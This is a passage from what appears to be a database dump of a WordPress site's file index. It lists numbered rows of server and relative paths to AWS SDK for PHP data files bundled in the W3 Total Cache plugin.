src/data/logs/2014-03-28/api-2.json.php'),(6044,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/logs/2014-03-28/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/logs/2014-03-28/paginators-1.json.php'),(6045,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/logs/2014-03-28/smoke.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/logs/2014-03-28/smoke.json.php'),(6046,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/lookoutequipment/2020-12-15/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/lookoutequipment/2020-12-15/api-2.json.php'),(6047,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/lookoutequipment/2020-12-15/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/lookoutequipment/2020-12-15/paginators-1.json.php'),(6048,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/lookoutmetrics/2017-07-25/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/lookoutmetrics/2017-07-25/api-2.json.php'),(6049,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/lookoutmetrics/2017-07-25/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/lookoutmetrics/2017-07-25/paginators-1.json.php'),(6050,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/lookoutvision/2020-11-20/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/lookoutvision/2020-11-20/api-2.json.php'),(6051,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/lookoutvision/2020-11-20/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/lookoutvision/2020-11-20/paginators-1.json.php'),(6052,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/machinelearning/2014-12-12/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/machinelearning/2014-12-12/api-2.json.php'),(6053,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/machinelearning/2014-12-12/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/machinelearning/2014-12-12/paginators-1.json.php'),(6054,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/machinelearning/2014-12-12/waiters-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/machinelearning/2014-12-12/waiters-2.json.php'),(6055,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/macie/2017-12-19/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/macie/2017-12-19/api-2.json.php'),(6056,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/macie/2017-12-19/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/macie/2017-12-19/paginators-1.json.php'),(6057,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/macie2/2020-01-01/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/macie2/2020-01-01/api-2.json.php'),(6058,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/macie2/2020-01-01/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/macie2/2020-01-01/paginators-1.json.php'),(6059,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/managedblockchain/2018-09-24/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/managedblockchain/2018-09-24/api-2.json.php'),(6060,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/managedblockchain/2018-09-24/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/managedblockchain/2018-09-24/paginators-1.json.php'),(6061,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/manifest.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/manifest.json.php'),(6062,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/marketplace-catalog/2018-09-17/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/marketplace-catalog/2018-09-17/api-2.json.php'),(6063,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/marketplace-catalog/2018-09-17/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/marketplace-catalog/2018-09-17/paginators-1.json.php'),(6064,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/marketplacecommerceanalytics/2015-07-01/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/marketplacecommerceanalytics/2015-07-01/api-2.json.php'),(6065,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/marketplacecommerceanalytics/2015-07-01/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/marketplacecommerceanalytics/2015-07-01/paginators-1.json.php'),(6066,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/marketplacecommerceanalytics/2015-07-01/smoke.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/marketplacecommerceanalytics/2015-07-01/smoke.json.php'),(6067,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/mediaconnect/2018-11-14/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/mediaconnect/2018-11-14/api-2.json.php'),(6068,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/mediaconnect/2018-11-14/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/mediaconnect/2018-11-14/paginators-1.json.php'),(6069,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/mediaconnect/2018-11-14/waiters-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/mediaconnect/2018-11-14/waiters-2.json.php'),(6070,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/mediaconvert/2017-08-29/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/mediaconvert/2017-08-29/api-2.json.php'),(6071,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/mediaconvert/2017-08-29/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/mediaconvert/2017-08-29/paginators-1.json.php'),(6072,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/medialive/2017-10-14/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/medialive/2017-10-14/api-2.json.php'),(6073,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/medialive/2017-10-14/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/medialive/2017-10-14/paginators-1.json.php'),(6074,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/medialive/2017-10-14/waiters-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/medialive/2017-10-14/waiters-2.json.php'),(6075,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/mediapackage/2017-10-12/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/mediapackage/2017-10-12/api-2.json.php'),(6076,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/mediapackage/2017-10-12/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/mediapackage/2017-10-12/paginators-1.json.php'),(6077,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/mediapackage-vod/2018-11-07/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/mediapackage-vod/2018-11-07/api-2.json.php'),(6078,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/mediapackage-vod/2018-11-07/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/mediapackage-vod/2018-11-07/paginators-1.json.php'),(6079,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/mediastore/2017-09-01/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/mediastore/2017-09-01/api-2.json.php'),(6080,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/mediastore/2017-09-01/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/mediastore/2017-09-01/paginators-1.json.php'),(6081,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/mediastore-data/2017-09-01/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/mediastore-data/2017-09-01/api-2.json.php'),(6082,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/mediastore-data/2017-09-01/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/mediastore-data/2017-09-01/paginators-1.json.php'),(6083,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/mediatailor/2018-04-23/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/mediatailor/2018-04-23/api-2.json.php'),(6084,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/mediatailor/2018-04-23/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/mediatailor/2018-04-23/paginators-1.json.php'),(6085,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/metering.marketplace/2016-01-14/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/metering.marketplace/2016-01-14/api-2.json.php'),(6086,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/metering.marketplace/2016-01-14/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/metering.marketplace/2016-01-14/paginators-1.json.php'),(6087,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/mgh/2017-05-31/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/mgh/2017-05-31/api-2.json.php'),(6088,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/mgh/2017-05-31/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/mgh/2017-05-31/paginators-1.json.php'),(6089,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/mgn/2020-02-26/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/mgn/2020-02-26/api-2.json.php'),(6090,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/mgn/2020-02-26/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/mgn/2020-02-26/paginators-1.json.php'),(6091,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/migrationhub-config/2019-06-30/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/migrationhub-config/2019-06-30/api-2.json.php'),(6092,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/migrationhub-config/2019-06-30/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/migrationhub-config/2019-06-30/paginators-1.json.php'),(6093,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/mobile/2017-07-01/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/mobile/2017-07-01/api-2.json.php'),(6094,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/mobile/2017-07-01/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/mobile/2017-07-01/paginators-1.json.php'),(6095,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/models.lex.v2/2020-08-07/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/models.lex.v2/2020-08-07/api-2.json.php'),(6096,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/models.lex.v2/2020-08-07/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/models.lex.v2/2020-08-07/paginators-1.json.php'),(6097,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/monitoring/2010-08-01/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/monitoring/2010-08-01/api-2.json.php'),(6098,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/monitoring/2010-08-01/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/monitoring/2010-08-01/paginators-1.json.php'),(6099,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/monitoring/2010-08-01/smoke.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/monitoring/2010-08-01/smoke.json.php'),(6100,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/monitoring/2010-08-01/waiters-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/monitoring/2010-08-01/waiters-2.json.php'),(6101,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/mq/2017-11-27/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/mq/2017-11-27/api-2.json.php'),(6102,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/mq/2017-11-27/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/mq/2017-11-27/paginators-1.json.php'),(6103,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/mturk-requester/2017-01-17/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/mturk-requester/2017-01-17/api-2.json.php'),(6104,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/mturk-requester/2017-01-17/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/mturk-requester/2017-01-17/paginators-1.json.php'),(6105,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/mturk-requester/2017-01-17/smoke.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/mturk-requester/2017-01-17/smoke.json.php'),(6106,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/mwaa/2020-07-01/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/mwaa/2020-07-01/api-2.json.php'),(6107,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/mwaa/2020-07-01/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/mwaa/2020-07-01/paginators-1.json.php'),(6108,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/neptune/2014-10-31/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/neptune/2014-10-31/api-2.json.php'),(6109,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/neptune/2014-10-31/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/neptune/2014-10-31/paginators-1.json.php'),(6110,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/neptune/2014-10-31/smoke.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/neptune/2014-10-31/smoke.json.php'),(6111,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/neptune/2014-10-31/waiters-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/neptune/2014-10-31/waiters-2.json.php'),(6112,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/network-firewall/2020-11-12/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/network-firewall/2020-11-12/api-2.json.php'),(6113,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/network-firewall/2020-11-12/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/network-firewall/2020-11-12/paginators-1.json.php'),(6114,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/networkmanager/2019-07-05/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/networkmanager/2019-07-05/api-2.json.php'),(6115,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/networkmanager/2019-07-05/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/networkmanager/2019-07-05/paginators-1.json.php'),(6116,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/nimble/2020-08-01/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/nimble/2020-08-01/api-2.json.php'),(6117,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/nimble/2020-08-01/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/nimble/2020-08-01/paginators-1.json.php'),(6118,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/opsworks/2013-02-18/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/opsworks/2013-02-18/api-2.json.php'),(6119,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/opsworks/2013-02-18/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/opsworks/2013-02-18/paginators-1.json.php'),(6120,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/opsworks/2013-02-18/smoke.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/opsworks/2013-02-18/smoke.json.php'),(6121,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/opsworks/2013-02-18/waiters-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/opsworks/2013-02-18/waiters-2.json.php'),(6122,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/opsworkscm/2016-11-01/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/opsworkscm/2016-11-01/api-2.json.php'),(6123,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/opsworkscm/2016-11-01/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/opsworkscm/2016-11-01/paginators-1.json.php'),(6124,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/opsworkscm/2016-11-01/waiters-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/opsworkscm/2016-11-01/waiters-2.json.php'),(6125,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/organizations/2016-11-28/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/organizations/2016-11-28/api-2.json.php'),(6126,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/organizations/2016-11-28/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/organizations/2016-11-28/paginators-1.json.php'),(6127,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/outposts/2019-12-03/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/outposts/2019-12-03/api-2.json.php'),(6128,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/outposts/2019-12-03/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/outposts/2019-12-03/paginators-1.json.php'),(6129,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/personalize/2018-05-22/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/personalize/2018-05-22/api-2.json.php'),(6130,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/personalize/2018-05-22/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/personalize/2018-05-22/paginators-1.json.php'),(6131,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/personalize-events/2018-03-22/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/personalize-events/2018-03-22/api-2.json.php'),(6132,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/personalize-events/2018-03-22/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/personalize-events/2018-03-22/paginators-1.json.php'),(6133,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/personalize-runtime/2018-05-22/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/personalize-runtime/2018-05-22/api-2.json.php'),(6134,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/personalize-runtime/2018-05-22/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/personalize-runtime/2018-05-22/paginators-1.json.php'),(6135,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/pi/2018-02-27/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/pi/2018-02-27/api-2.json.php'),(6136,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/pi/2018-02-27/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/pi/2018-02-27/paginators-1.json.php'),(6137,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/pinpoint/2016-12-01/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/pinpoint/2016-12-01/api-2.json.php'),(6138,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/pinpoint-email/2018-07-26/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/pinpoint-email/2018-07-26/api-2.json.php'),(6139,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/pinpoint-email/2018-07-26/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/pinpoint-email/2018-07-26/paginators-1.json.php'),(6140,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/polly/2016-06-10/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/polly/2016-06-10/api-2.json.php'),(6141,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/polly/2016-06-10/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/polly/2016-06-10/paginators-1.json.php'),(6142,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/polly/2016-06-10/smoke.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/polly/2016-06-10/smoke.json.php'),(6143,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/pricing/2017-10-15/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/pricing/2017-10-15/api-2.json.php'),(6144,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/pricing/2017-10-15/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/pricing/2017-10-15/paginators-1.json.php'),(6145,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/qldb/2019-01-02/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/qldb/2019-01-02/api-2.json.php'),(6146,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/qldb/2019-01-02/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/qldb/2019-01-02/paginators-1.json.php'),(6147,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/qldb-session/2019-07-11/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/qldb-session/2019-07-11/api-2.json.php'),(6148,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/qldb-session/2019-07-11/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/qldb-session/2019-07-11/paginators-1.json.php'),(6149,'/home/tummmyov/tummyrevolution.com/wp-c